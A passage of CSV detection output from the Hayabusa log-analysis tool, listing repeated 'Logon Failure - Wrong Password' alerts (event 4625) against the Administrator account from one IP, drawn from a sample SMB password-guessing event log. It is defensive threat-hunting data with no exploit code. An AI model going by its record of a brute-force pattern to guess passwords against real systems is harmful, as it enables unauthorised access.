NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: 